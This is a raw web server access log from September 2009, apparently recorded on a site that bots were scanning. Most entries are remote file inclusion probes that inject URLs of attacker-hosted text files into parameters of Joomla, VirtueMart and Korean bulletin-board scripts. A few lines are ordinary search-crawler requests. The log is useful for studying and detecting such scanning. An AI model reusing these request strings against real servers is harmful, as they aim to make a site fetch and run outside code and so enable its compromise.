70.90.108.169 - - [08/Sep/2009:02:56:24 -0500] "GET /logs/?view=page&pagename=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 200 204197 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:02:56:37 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:02:56:37 -0500] "GET /logs/access_log.1243036800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:02:56:37 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:58:44 -0500] "GET /logs/access_log.1230768000///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.55.207.133 - - [08/Sep/2009:02:59:02 -0500] "GET /logs/access_log.1165276800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
199.120.90.223 - - [08/Sep/2009:02:59:23 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:02:59:23 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:02:59:23 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.207.45 - - [08/Sep/2009:03:00:02 -0500] "GET /logs/access_log.1200355200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.207.172.166 - - [08/Sep/2009:03:03:18 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:03:03:18 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:03:03:18 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:03:03:18 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:03:03:34 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:03:03:34 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:03:03:35 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:03:03:36 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:03:03:41 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:03:03:41 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:03:03:41 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:03:03:41 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:03:03:54 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.pyungsan.or.kr//bbs//id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:03:03:55 -0500] "GET /logs/access_log.1237075200//include/lib.inc.php?site_path=http://www.pyungsan.or.kr//bbs//id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:03:03:55 -0500] "GET //include/lib.inc.php?site_path=http://www.pyungsan.or.kr//bbs//id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.40.68.132 - - [08/Sep/2009:03:04:32 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.40.68.132 - - [08/Sep/2009:03:04:32 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.40.68.132 - - [08/Sep/2009:03:04:33 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:03:05:12 -0500] "GET //path/linkadmin.php?page=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:03:05:12 -0500] "GET /logs//path/linkadmin.php?page=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:03:05:56 -0500] "GET //path/linkadmin.php?page=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:03:05:59 -0500] "GET /logs//path/linkadmin.php?page=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
199.120.90.223 - - [08/Sep/2009:03:06:03 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:03:06:04 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:03:06:04 -0500] "GET /logs//path/linkadmin.php?page=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:03:06:04 -0500] "GET //path/linkadmin.php?page=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
199.120.90.223 - - [08/Sep/2009:03:06:04 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:09:21 -0500] "GET /logs/sboard.php??dir=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:09:21 -0500] "GET /logs/access_log.1236211200/sboard.php??dir=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:09:22 -0500] "GET /sboard.php??dir=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:09:43 -0500] "GET /logs/access_log.1230768000/sboard.php??dir=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:10:13 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:10:13 -0500] "GET /logs/access_log.1236211200///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:10:22 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:10:22 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:10:22 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:10:23 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:03:10:29 -0500] "GET /logs//components/errors.php?error=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:03:10:29 -0500] "GET //components/errors.php?error=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
208.64.216.6 - - [08/Sep/2009:03:10:34 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:03:10:40 -0500] "GET //components/errors.php?error=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:03:10:40 -0500] "GET /logs//components/errors.php?error=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
208.64.216.6 - - [08/Sep/2009:03:11:46 -0500] "GET /logs/access_log.1230768000///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:12:39 -0500] "GET /logs/board.php??dir=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:12:39 -0500] "GET /board.php??dir=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:12:39 -0500] "GET /logs/access_log.1236211200/board.php??dir=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:03:13:21 -0500] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:03:13:21 -0500] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:03:13:21 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:14:16 -0500] "GET /logs/access_log.1230768000/board.php??dir=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:03:14:38 -0500] "GET /logs/access_log.1241395200%22%20target=%22_blank//components/errors.php?error=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.189.18.73 - - [08/Sep/2009:03:14:38 -0500] "GET /logs//components/errors.php?error=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.189.18.73 - - [08/Sep/2009:03:14:38 -0500] "GET //components/errors.php?error=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.189.18.73 - - [08/Sep/2009:03:14:38 -0500] "GET /logs/access_log.1244505600%22%20target=%22_blank//components/errors.php?error=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.189.18.73 - - [08/Sep/2009:03:14:40 -0500] "GET /logs/access_log.1241395200%22%20target=%22_blank//components/errors.php?error=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
211.189.18.73 - - [08/Sep/2009:03:14:40 -0500] "GET /logs//components/errors.php?error=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
211.189.18.73 - - [08/Sep/2009:03:14:40 -0500] "GET /logs/access_log.1244505600%22%20target=%22_blank//components/errors.php?error=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.38.136.251 - - [08/Sep/2009:03:14:47 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.189.2.39 - - [08/Sep/2009:03:15:37 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.189.2.39 - - [08/Sep/2009:03:15:37 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.189.2.39 - - [08/Sep/2009:03:15:37 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.189.2.39 - - [08/Sep/2009:03:15:37 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.40.25.236 - - [08/Sep/2009:03:16:06 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.40.25.236 - - [08/Sep/2009:03:16:06 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.40.25.236 - - [08/Sep/2009:03:16:06 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.40.25.236 - - [08/Sep/2009:03:16:06 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.228.3.118 - - [08/Sep/2009:03:21:37 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.228.3.118 - - [08/Sep/2009:03:21:37 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:03:22:28 -0500] "GET /logs/access_log.1236211200//include/lib.inc.php?site_path=http://www.pyungsan.or.kr//bbs//id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
58.150.109.161 - - [08/Sep/2009:03:22:36 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.150.109.161 - - [08/Sep/2009:03:22:36 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.150.109.161 - - [08/Sep/2009:03:22:36 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.150.109.161 - - [08/Sep/2009:03:22:39 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.228.3.118 - - [08/Sep/2009:03:23:08 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.175.25.226 - - [08/Sep/2009:03:25:34 -0500] "GET /logs/access_log.1241913600//latest/sirini_gallery_latest/list.php?path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.175.25.226 - - [08/Sep/2009:03:25:34 -0500] "GET /logs//latest/sirini_gallery_latest/list.php?path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.175.25.226 - - [08/Sep/2009:03:25:34 -0500] "GET //latest/sirini_gallery_latest/list.php?path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.175.25.226 - - [08/Sep/2009:03:25:42 -0500] "GET /logs/access_log.1233705600//latest/sirini_gallery_latest/list.php?path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.175.25.226 - - [08/Sep/2009:03:26:08 -0500] "GET /logs/access_log.1236384000//latest/sirini_gallery_latest/list.php?path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
209.172.33.230 - - [08/Sep/2009:03:26:29 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
209.172.33.230 - - [08/Sep/2009:03:26:29 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
65.55.106.108 - - [08/Sep/2009:03:27:33 -0500] "GET /logs/access_log.1137801600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.146.119.209 - - [08/Sep/2009:03:27:46 -0500] "GET /logs//latest/sirini_gallery_latest/list.php?path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:03:27:46 -0500] "GET //latest/sirini_gallery_latest/list.php?path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:03:27:46 -0500] "GET /logs/access_log.1236384000//latest/sirini_gallery_latest/list.php?path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:03:27:50 -0500] "GET /logs/access_log.1233705600//latest/sirini_gallery_latest/list.php?path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:03:28:38 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:03:28:38 -0500] "GET /logs/access_log.1243641600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:03:28:38 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:03:28:43 -0500] "GET /logs/access_log.1239321600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:03:30:46 -0500] "GET //amazon/cart.php?cmd=add&asin=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:03:30:46 -0500] "GET /logs//amazon/cart.php?cmd=add&asin=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:03:30:46 -0500] "GET /logs/access_log.1245369600//amazon/cart.php?cmd=add&asin=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:03:30:46 -0500] "GET /logs/access_log.1242604800//amazon/cart.php?cmd=add&asin=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:03:31:32 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:03:31:32 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:03:31:32 -0500] "GET /logs/access_log.1247184000//bemarket/postscript/postscript.php?p_mode=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:03:31:36 -0500] "GET /logs/access_log.1246320000//bemarket/postscript/postscript.php?p_mode=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:03:32:14 -0500] "GET /logs/index.php?main=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:03:32:15 -0500] "GET /index.php?main=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:03:32:16 -0500] "GET /logs/access_log.1243728000/index.php?main=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:03:32:25 -0500] "GET /index.php?main=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:03:32:25 -0500] "GET /logs/index.php?main=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:03:32:26 -0500] "GET /logs/access_log.1243728000/index.php?main=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
77.88.31.247 - - [08/Sep/2009:03:32:45 -0500] "GET / HTTP/1.1" 200 3245 "-""Yandex/1.01.001 (compatible; Win16; I)"
195.137.160.12 - - [08/Sep/2009:03:36:35 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:03:36:35 -0500] "GET //skin/zero_vote/error.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:03:36:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.175.25.226 - - [08/Sep/2009:03:36:44 -0500] "GET /logs//include/footer.php?_path[counter]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.175.25.226 - - [08/Sep/2009:03:36:44 -0500] "GET /logs/access_log.1242432000//include/footer.php?_path[counter]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.175.25.226 - - [08/Sep/2009:03:36:44 -0500] "GET //include/footer.php?_path[counter]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:03:37:03 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:03:37:03 -0500] "GET //skin/zero_vote/error.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
